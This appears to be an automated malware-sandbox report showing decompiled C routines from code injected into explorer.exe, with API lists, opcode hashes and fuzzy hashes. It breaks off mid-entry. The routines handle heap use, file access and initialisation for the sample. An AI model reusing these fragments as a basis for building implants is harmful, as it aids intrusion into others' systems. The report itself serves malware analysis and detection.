                            • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                            • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                            • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E0008A63B(WCHAR* __ecx) {
                            				signed int _t5;
                            
                            				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                            				_t2 = _t5 + 1; // 0x1
                            				asm("sbb ecx, ecx");
                            				return _t5 &  ~_t2;
                            			}





                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                            • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00088604(long _a4) {
                            				void* _t2;
                            
                            				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                            				return _t2;
                            			}





                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                            • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008B269(WCHAR* __ecx) {
                            
                            				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                            			}




                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                            • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E000885EF() {
                            				void* _t1;
                            
                            				_t1 = HeapCreate(0, 0x80000, 0); // executed
                            				 *0x9e768 = _t1;
                            				return _t1;
                            			}





                            APIs
                            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                            • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008F9BF(void* __edx) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				intOrPtr _t26;
                            				char _t27;
                            				intOrPtr _t29;
                            				void* _t31;
                            				void* _t36;
                            				char _t38;
                            				intOrPtr _t39;
                            				char _t42;
                            				intOrPtr _t51;
                            				intOrPtr _t52;
                            				intOrPtr* _t63;
                            				intOrPtr _t66;
                            				char* _t67;
                            				intOrPtr _t69;
                            				char _t78;
                            				void* _t81;
                            				void* _t82;
                            
                            				_t26 =  *0x9e654; // 0x286fd30
                            				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                            				_v12 = _t27;
                            				if(_t27 != 0) {
                            					_t63 =  *0x9e654; // 0x286fd30
                            					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                            						E000886E1(_t27,  *_t63, 0x400);
                            						_v8 = 0;
                            						_t36 = E0008109A(_t63, 0x34a);
                            						_t66 =  *0x9e688; // 0xb0000
                            						_t72 =  !=  ? 0x67d : 0x615;
                            						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                            						_push(0);
                            						_push(_t36);
                            						_t67 = "\\";
                            						_v24 = _t38;
                            						_push(_t67);
                            						_push(_t38);
                            						_t39 =  *0x9e688; // 0xb0000
                            						_push(_t67);
                            						_v20 = E000892E5(_t39 + 0x1020);
                            						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                            						_v16 = _t42;
                            						E000885D5( &_v24);
                            						E000885D5( &_v20);
                            						_t73 = _v16;
                            						_t82 = _t81 + 0x3c;
                            						_t69 = _v8;
                            						if(_v16 != 0 && _t69 > 0x400) {
                            							_t51 =  *0x9e654; // 0x286fd30
                            							_t52 =  *((intOrPtr*)(_t51 + 4));
                            							_t53 =  <  ? _t69 : _t52;
                            							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                            							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                            							_t69 = _v8;
                            							_t82 = _t82 + 0xc;
                            						}
                            						E0008861A( &_v16, _t69);
                            						E0008861A( &_v20, 0xfffffffe);
                            						_t27 = _v12;
                            						_t81 = _t82 + 0x10;
                            						_t63 =  *0x9e654; // 0x286fd30
                            					}
                            					_t78 = 0;
                            					while(1) {
                            						_t29 =  *0x9e688; // 0xb0000
                            						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                            						_t81 = _t81 + 0xc;
                            						if(_t31 >= 0) {
                            							break;
                            						}
                            						Sleep(1);
                            						_t78 = _t78 + 1;
                            						if(_t78 < 0x2710) {
                            							_t27 = _v12;
                            							_t63 =  *0x9e654; // 0x286fd30
                            							continue;
                            						}
                            						break;
                            					}
                            					E0008861A( &_v12, 0);
                            				}
                            				return 0;
                            			}


























                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID:
                            • API String ID: 4201116106-0
                            • Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                            • Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                            				char _v8;
                            				WCHAR* _v12;
                            				signed int _v16;
                            				WCHAR* _v20;
                            				short _t30;
                            				short _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t43;
                            				intOrPtr _t45;
                            				short _t49;
                            				void* _t52;
                            				char _t71;
                            				WCHAR* _t72;
                            
                            				_v16 = _v16 & 0x00000000;
                            				_t71 = 0;
                            				_v12 = __ecx;
                            				_t49 = __edx;
                            				_v8 = 0;
                            				_t72 = E00088604(0x448);
                            				_v20 = _t72;
                            				_pop(_t52);
                            				if(_t72 != 0) {
                            					_t72[0x21a] = __edx;
                            					_t72[0x21c] = _a8;
                            					lstrcpynW(_t72, _v12, 0x200);
                            					if(_t49 != 1) {
                            						_t30 = E00088604(0x100000);
                            						_t72[0x212] = _t30;
                            						if(_t30 != 0) {
                            							_t69 = _a4;
                            							_t72[0x216] = 0x100000;
                            							if(_a4 != 0) {
                            								E000887EA(_t72, _t69);
                            							}
                            							L16:
                            							return _t72;
                            						}
                            						L7:
                            						if(_t71 != 0) {
                            							E0008861A( &_v8, 0);
                            						}
                            						L9:
                            						_t33 = _t72[0x218];
                            						if(_t33 != 0) {
                            							_t38 =  *0x9e684; // 0x286f8f0
                            							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                            						}
                            						_t73 =  &(_t72[0x212]);
                            						if(_t72[0x212] != 0) {
                            							E0008861A(_t73, 0);
                            						}
                            						E0008861A( &_v20, 0);
                            						goto L1;
                            					}
                            					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                            					_t71 = _t43;
                            					_v8 = _t71;
                            					if(_t71 == 0) {
                            						goto L9;
                            					}
                            					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                            						goto L7;
                            					} else {
                            						_t45 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                            						_t72[0x218] = _t72[0x218] & 0x00000000;
                            						E0008861A( &_v8, 0);
                            						goto L16;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpyn
                            • String ID:
                            • API String ID: 680773602-0
                            • Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                            • Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0008E2C6(void* __fp0, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				void* _v24;
                            				void* _v28;
                            				char _v32;
                            				char _v544;
                            				signed int _t40;
                            				intOrPtr _t41;
                            				intOrPtr _t48;
                            				void* _t52;
                            				intOrPtr _t58;
                            				void* _t65;
                            				intOrPtr _t66;
                            				void* _t70;
                            				signed int _t73;
                            				void* _t75;
                            				void* _t77;
                            
                            				_t77 = __fp0;
                            				_v20 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				_t66 =  *0x9e6b4; // 0x286fa98, executed
                            				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                            				if(_t40 == 0) {
                            					_t73 = 0;
                            					if(_v20 <= 0) {
                            						L9:
                            						_t41 =  *0x9e6b4; // 0x286fa98
                            						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                            						return 0;
                            					}
                            					do {
                            						_v16 = 0;
                            						_v12 = 0;
                            						_t48 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                            						_t52 = E00088604(_v16 + 1); // executed
                            						_t70 = _t52;
                            						if(_t70 != 0) {
                            							_v12 = 0x200;
                            							_push( &_v32);
                            							_push( &_v12);
                            							_push( &_v544);
                            							_push( &_v16);
                            							_push(_t70);
                            							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                            							_t58 =  *0x9e68c; // 0x286fab8
                            							_push(0);
                            							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                            								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                            								_t75 = _t75 + 0xc;
                            								Sleep(0xa);
                            							}
                            						}
                            						_t73 = _t73 + 1;
                            					} while (_t73 < _v20);
                            					goto L9;
                            				}
                            				return _t40 | 0xffffffff;
                            			}

                            APIs
                            • Sleep.KERNELBASE(0000000A), ref: 0008E394
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                            • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                            				intOrPtr _v8;
                            				signed int _v16;
                            				char _v20;
                            				void* _t24;
                            				char _t25;
                            				signed int _t30;
                            				intOrPtr* _t45;
                            				signed int _t46;
                            				void* _t47;
                            				void* _t54;
                            
                            				_t54 = __fp0;
                            				_t45 = __edx;
                            				_t46 = 0;
                            				_t30 = __ecx;
                            				if( *__edx > 0) {
                            					do {
                            						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                            						if(_t24 == 0) {
                            							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                            							_v8 = _t25;
                            							if(_t25 != 0) {
                            								L6:
                            								_v16 = _v16 & 0x00000000;
                            								_v20 = _t25;
                            								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                            								_t47 = _t47 + 0xc;
                            							} else {
                            								if(GetLastError() != 0xd) {
                            									_t25 = _v8;
                            									goto L6;
                            								} else {
                            									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                            								}
                            							}
                            						}
                            						_t46 = _t46 + 1;
                            					} while (_t46 <  *_t45);
                            				}
                            				return 0;
                            			}

                            APIs
                              • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                            • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                            • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E00085D7D(void* __eflags) {
                            				char _v44;
                            				intOrPtr _t7;
                            				intOrPtr _t10;
                            				void* _t11;
                            				WCHAR* _t12;
                            				WCHAR* _t13;
                            				WCHAR* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t19;
                            				intOrPtr _t22;
                            				void* _t27;
                            				WCHAR* _t28;
                            
                            				_t7 =  *0x9e688; // 0xb0000
                            				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                            				_t10 =  *0x9e684; // 0x286f8f0
                            				_t28 = 2;
                            				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                            				if(_t11 == 0) {
                            					_t22 =  *0x9e688; // 0xb0000
                            					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                            					 *0x9e6ac = _t12;
                            					__eflags = _t12;
                            					if(_t12 != 0) {
                            						_t14 = E00089EBB();
                            						__eflags = _t14;
                            						if(_t14 == 0) {
                            							_t28 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t15 =  *0x9e688; // 0xb0000
                            							lstrcmpiW(_t15 + 0x228, _t14);
                            							asm("sbb esi, esi");
                            							_t28 = _t28 + 1;
                            						}
                            					}
                            					_t13 = _t28;
                            				} else {
                            					_t19 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                            					_t13 = 3;
                            				}
                            				return _t13;
                            			}

                            APIs
                            • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                            • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008BA05() {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _t15;
                            				void* _t16;
                            				void* _t18;
                            				void* _t21;
                            				intOrPtr _t22;
                            				void* _t24;
                            				void* _t30;
                            
                            				_v8 = _v8 & 0x00000000;
                            				_t15 =  *0x9e68c; // 0x286fab8
                            				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                            				if(_t16 != 0) {
                            					_v12 = _v12 & 0x00000000;
                            					_t18 = E0008B998(1,  &_v12); // executed
                            					_t30 = _t18;
                            					if(_t30 != 0) {
                            						CloseHandle(_v8);
                            						_t21 = _t30;
                            					} else {
                            						if(_v8 != _t18) {
                            							_t22 =  *0x9e684; // 0x286f8f0
                            							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                            						}
                            						_t21 = 0;
                            					}
                            					return _t21;
                            				} else {
                            					return _t16;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                            • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                            				void _v44;
                            				signed int _t8;
                            				intOrPtr _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t21;
                            				void* _t24;
                            				void* _t29;
                            				void* _t35;
                            
                            				_t35 = __eflags;
                            				_t24 = __ecx;
                            				_t8 =  *0x9e688; // 0xb0000
                            				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                            				E000885EF();
                            				E00088F78();
                            				 *0x9e780 = 0;
                            				 *0x9e784 = 0;
                            				 *0x9e77c = 0;
                            				E00085EB6(); // executed
                            				E0008CF84(_t24);
                            				_t14 =  *0x9e688; // 0xb0000
                            				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                            				_t15 =  *0x9e688; // 0xb0000
                            				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                            				E0008B337( &_v44);
                            				memset( &_v44, 0, 0x27);
                            				E00085C26( &_v44, __fp0);
                            				_t21 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                            				return 0;
                            			}

                            APIs
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                              • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                              • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                              • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                              • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                              • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            • memset.MSVCRT ref: 00085D5F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                            • String ID:
                            • API String ID: 4245722550-0
                            • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                            • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008861A(int _a4, intOrPtr _a8) {
                            				int _t3;
                            				intOrPtr _t4;
                            				void* _t9;
                            
                            				_t3 = _a4;
                            				if(_t3 == 0) {
                            					return _t3;
                            				}
                            				_t9 =  *_t3;
                            				if(_t9 != 0) {
                            					 *_t3 =  *_t3 & 0x00000000;
                            					_t4 = _a8;
                            					if(_t4 != 0xffffffff) {
                            						if(_t4 == 0xfffffffe) {
                            							_t4 = E0008C392(_t9);
                            						}
                            					} else {
                            						_t4 = E0008C379(_t9);
                            					}
                            					E0008874F(_t9, 0, _t4);
                            					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                            				}
                            				return _t3;
                            			}

                            APIs
                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                            • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				signed int _t5;
                            				void* _t6;
                            				void* _t10;
                            				long _t15;
                            				void* _t17;
                            
                            				_t15 = 2;
                            				_t5 = E0008A5F7(_a4, _t15);
                            				_t17 = _t5;
                            				if(_t17 != 0) {
                            					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                            					if(_t6 != 0) {
                            						CloseHandle(_t17);
                            						return 0;
                            					}
                            					_t10 = 0xfffffffe;
                            					return _t10;
                            				}
                            				return _t5 | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                            • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E000898A6(void* __eflags, intOrPtr _a4) {
                            				intOrPtr _t24;
                            
                            				_t24 = _a4;
                            				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                            					CloseHandle( *(_t24 + 0x1c));
                            					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                            					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                            						E0008984A(_t24, 1);
                            					}
                            					return  *((intOrPtr*)(_t24 + 0x18));
                            				}
                            				return 0;
                            			}

                            APIs
                            • CloseHandle.KERNELBASE(?), ref: 000898CA
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
